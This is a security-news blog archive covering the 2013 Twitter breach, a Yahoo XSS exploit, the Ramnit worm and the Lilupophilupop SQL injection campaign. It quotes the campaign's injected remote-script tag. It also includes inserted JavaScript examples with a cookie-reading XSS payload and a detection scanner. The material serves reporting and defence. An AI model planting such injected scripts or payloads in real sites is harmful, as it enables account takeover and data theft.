Category: Website Hacking

Feb 02 2013

Twitter Hacked – 250,000 Accounts Compromised

In a blog post last Friday, Twitter’s Director of Information Security Bob Lord said the company had discovered a major attack and shut it down almost immediately, but the attackers may have had access to user names, email addresses, session tokens and passwords for approximately 250,000 users.

Lord said that Twitter detected unusual access patterns that led to it identifying unauthorised access attempts to Twitter user data.

“We discovered one live attack and were able to shut it down in process moments later. As a precautionary security measure, we have reset passwords and revoked session tokens for these accounts. If your account was one of them, you will have recently received (or will shortly) an email from us at the address associated with your Twitter account notifying you that you will need to create a new password. Your old password will not work when you try to log in to Twitter.

Though only a very small percentage of our users were potentially affected by this attack, we encourage all users to take this opportunity to ensure that they are following good password hygiene, on Twitter and elsewhere on the Internet. Make sure you use a strong password – at least ten (but more is better) characters and a mixture of upper- and lowercase letters, numbers, and symbols – that you are not using for any other accounts or sites.

Using the same password for multiple online accounts significantly increases your odds of being compromised. If you are not using good password hygiene, take a moment now to change your Twitter passwords. We also echo the advisory from the US Department of Homeland Security and security experts to encourage users to disable Java on their computers in their browsers”.

The attack follows hacks into a number of major media outlets, including The Washington Post, The New York Times, and The Wall Street Journal. Unnamed sources quoted by the newspapers say they suspect Chinese hackers, possibly associated with the Chinese government, to be involved.

Twitter has not said how the hackers were able to infiltrate its systems, but its blog post alluded to the hackers having broken in through a zero-day vulnerability in Oracle’s Java software.

Nov 28 2012

Yahoo Account Exploit Selling on Black Market

Yahoo is investigating the claims of a hacker who is selling an exploit that apparently hijacks Yahoo mail accounts.

The exploit, being sold for $700 by an Egyptian hacker on an exclusive cybercrime forum, targets a cross-site scripting (XSS) weakness in yahoo.com that lets attackers steal cookies from Yahoo! Webmail users.

Such a flaw would let attackers send or read email from the victim’s account. In a typical XSS attack, an attacker sends a malicious link to an unsuspecting user; if the user clicks the link, the script is executed, and can access cookies, session tokens or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

Demonstrating an apparent flair for marketing, the hacker, under the alias “TheHell”, also posted a video on YouTube providing a demo for potential customers. He claims it works with all browsers and does not require a bypass of the XSS filters in either Chrome or Internet Explorer. He also says the exploit will be sold only to trusted individuals who are not likely to turn it over to Yahoo, which would undoubtedly develop a patch that will foil the attack.

“TheHell” claims that his exploit attacks a “stored” XSS flaw. In this type of attack the injected code is stored permanently on the targeted server until it is found and removed; the malicious code is then served to the victim’s browser whenever that page is legitimately requested.
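The cookie-theft mechanism described in the two paragraphs above, as an added example that is not code from the article or from Yahoo: a webmail client that renders a stored message body as raw HTML, the same renderer with output encoding, and an HttpOnly session cookie as a second layer. The message body, the cookie header and the function names are constructed for illustration.

```javascript
// Added example (not from the article or from Yahoo): a stored-XSS flaw in a
// webmail renderer, its hardened form, and an HttpOnly session cookie.

// Constructed sample: a message body as an attacker would have it stored
// server-side, delivered to every recipient who opens the message.
const STORED_BODY = 'Hi! <img src=x onerror="alert(document.cookie)">';

// Vulnerable renderer: interpolates stored data as trusted HTML, so the
// <img> element and its onerror handler become part of the page.
function renderMessageVulnerable(body) {
  return `<div class="msg">${body}</div>`;
}

// Encode the five characters that can change meaning in an HTML text context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened renderer: the body can only ever be rendered as text, never as markup.
function renderMessageSafe(body) {
  return `<div class="msg">${escapeHtml(body)}</div>`;
}

// Count real tag openers in the output; the wrapper div contributes exactly two
// (its start and end tag), so anything above two came from the message body.
function tagCount(html) {
  return (html.match(/<[a-z/]/gi) || []).length;
}

// Second layer of defence: with HttpOnly set, a script that does run cannot read
// the session cookie through document.cookie, so it cannot send it elsewhere.
function sessionCookieHeader(token) {
  return `session=${token}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}
```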

A standard phishing attempt is used to access the user’s cookies, from which the attacker can access the person’s email, or take full control of the account.

As of Tuesday morning, Yahoo was in the process of trying to identify the infected URL. Once the identification is successful, the malicious portion of code will be deleted.

Jan 06 2012

Ramnit Worm Targets Facebook, Over 45,000 Accounts Compromised

Much has been written about the Ramnit worm and its transformation into financial malware. And now Seculert’s research lab has discovered that Ramnit recently started targeting Facebook accounts with considerable success, stealing over 45,000 Facebook login credentials worldwide, mostly from people in the UK and France.

Ramnit was discovered in April 2010, when the Microsoft Malware Protection Center (MMPC) described it as “a multi-component malware family which infects Windows executable as well as HTML files”, “stealing sensitive information such as stored FTP credentials and browser cookies”. In July 2011 a Symantec report estimated that Ramnit worm variants accounted for 17.3 percent of all new malicious software infections.

In August 2011, Trusteer reported that Ramnit had gone ‘financial’. Following the leak of the ZeuS source code in May, it has been suggested that the hackers behind Ramnit merged in several financial-fraud capabilities to create a “Hybrid creature” empowered by both the scale of the Ramnit infection and the ZeuS financial data-sniffing capabilities.

With the recent ZeuS Facebook worm and this latest Ramnit variant, it appears that sophisticated hackers are now experimenting with replacing the old-school email worms with more up-to-date social network worms. As demonstrated by the 45,000 compromised Facebook subscribers, the viral power of social networks can be manipulated to cause considerable damage to individuals and institutions when it is in the wrong hands.

Seculert has provided Facebook with all of the stolen credentials that were found on the Ramnit servers.

Jan 05 2012

Hackers Threaten to Post Source Code for Symantec Product

Hackers have posted a file online that they claim is a confidential glimpse into Symantec’s Norton Antivirus program and have threatened to release source code for the security giant’s flagship antivirus product.

The hacker group, which calls itself the Lords of Dharmaraja, posted a file on Pastebin that it said described the confidential workings of Symantec’s Norton Antivirus threat-detection product. The documentation, and any source code, could be exploited by hackers to corrupt the antivirus program or write malicious code that circumvents Norton’s product altogether. The original post is no longer on Pastebin, although there is a Google cache.

The hackers claim to have discovered Symantec’s source code in a hack they conducted on India’s military and intelligence servers. In their online post, the hackers said, “We have discovered within the Indian Spy Program source codes of a dozen software companies,” which the hackers said had signed agreements with an Indian defense program and India’s Central Bureau of Investigation.

In an e-mail, a Symantec spokesman, Cris Paden, said the hackers’ post was an outdated document from 1999 that “explains how the software is designed to work (what inputs are accepted and what outputs are generated) and contains function names, but there is no actual source code present.”

The hacker group threatened to release the actual source code for the Norton AntiVirus software later on. “We are working out mirrors as of now,” the hackers wrote in their post.

Mr. Paden said Symantec was “currently investigating that.”

Symantec’s Norton brand antivirus products make up the bulk of its sales to consumers, which totaled nearly $2 billion last year — a third of Symantec’s revenue. If any part of its source code was exploited or tampered with, it could hurt Symantec’s share price and bottom line.

“If this document is from 1999, chances are the source code has changed a fair bit,” said Robert Rachwald, director of security strategy at Imperva, an Internet security company. “But if Symantec hasn’t done any major overhauls, there may be some parts of the code that remain intact,” he said, and someone could find a way to poke holes in it.

Jan 01 2012

Lilupophilupop SQL Injection Tops 1 Million Infected Pages

A SQL injection attack spreading at an extremely fast rate has been uncovered by the ISC (Internet Storm Center); it has grown from just a few hundred infected pages to over 1 million in just a few weeks.

Over the past few weeks, going over submitted results and information from internet users, they have put together some interesting data. The attack appears to be targeting Windows-based servers, and from the logs it seems the attackers had been doing a bit of probing in the weeks before the sites were injected with a special string:

"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

They have also put together a fairly solid set of statistics on which ccTLDs have been infected (shown below):

  • UK – 56,300
  • NL – 123,000
  • DE – 49,700
  • FR – 68,100
  • DK – 31,000
  • CN – 505
  • CA – 16,600
  • COM – 30,500
  • RU – 32,000
  • JP – 23,200
  • ORG – 2,690

At the moment it looks like the attack is partially automated and partially manual. The manual component and the number of sites infected suggest a reasonably sized workforce or a long preparation period.

If you want to find out if you have a problem, just search for "<script src="http://lilupophilupop.com/" in Google and use the site: operator to narrow the results to your domain.
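A local version of that check, as an added example that is not from the ISC diary or this post: scan a page’s HTML for external scripts loading from the indicator domain and for the characteristic `"></title><script` break-out shown above. The sample page and the function names are constructed for illustration.

```javascript
// Added example (not from the ISC diary or this post): a defender-side scan of
// rendered HTML for the Lilupophilupop injection marker. The injected string
// closes the <title> it typically lands in, then appends an external script tag.

// Constructed sample page, as a mass-SQL-injected product page might render.
const SAMPLE_PAGE = [
  '<html><head>',
  '<title>Widget A"></title><script src="http://lilupophilupop.com/sl.php"></script>',
  '</head><body>',
  '<p>Price: 9.99</p>',
  '<script src="/static/app.js"></script>',
  '</body></html>',
].join('\n');

// Every <script ... src=...> in the page, capturing the src value.
const SCRIPT_SRC_RE = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;

// True when the URL's host is the indicator domain or a subdomain of it.
// Relative URLs resolve against a placeholder base and so are never flagged.
function isIndicatorHost(url, indicatorDomain) {
  try {
    const host = new URL(url, 'http://placeholder.invalid').hostname.toLowerCase();
    return host === indicatorDomain || host.endsWith('.' + indicatorDomain);
  } catch {
    return false;
  }
}

// Returns each external script URL that loads from the indicator domain.
function findInjectedScripts(html, indicatorDomain = 'lilupophilupop.com') {
  const hits = [];
  for (const m of html.matchAll(SCRIPT_SRC_RE)) {
    if (isIndicatorHost(m[1], indicatorDomain)) hits.push(m[1]);
  }
  return hits;
}

// Also flag the title break-out itself, which survives a change of domain.
function hasTitleBreakout(html) {
  return /"><\/title><script\b/i.test(html);
}
```

The same two functions can be run over text columns pulled from the database, since that is where the injected string actually lives.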

Original Findings and Comments: ISC Diary | SQL Injection Attack happening ATM